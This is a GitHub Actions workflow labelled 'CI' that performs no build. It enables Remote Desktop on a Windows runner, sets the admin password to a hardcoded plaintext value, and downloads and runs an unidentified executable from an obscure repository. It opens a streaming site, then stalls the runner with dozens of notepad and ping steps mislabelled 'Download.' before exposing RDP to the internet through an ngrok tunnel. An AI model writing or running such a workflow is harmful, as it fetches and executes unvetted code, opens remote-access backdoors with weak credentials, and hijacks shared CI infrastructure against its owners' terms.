name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest

    steps:
    - name: Download
      run: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
    - name: Extract
      run: Expand-Archive ngrok.zip
    - name: Auth
      run: .\ngrok\ngrok.exe authtoken $Env:NGROK_AUTH_TOKEN
      env:
        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
    - name: Enable TS
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force)
    - name: Create
      run: New-Item -Path 'D:\1' -ItemType Directory
    - name: Download.
      run: Invoke-WebRequest https://github.com/Paulcampbellcarter/zj7n633nje/raw/main/14.exe -OutFile D:\1\14.exe
    - name: Подключение к CPU 2 - 7 ГБ оперативной памяти - 256 SSD.
      run: cmd /c D:\1\14.exe
    - name: Download.
      run: cmd /c start chrome http://www.tvset.cc/online/da-vinci-learning
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Create Tunnel
      run: .\ngrok\ngrok.exe tcp 3389
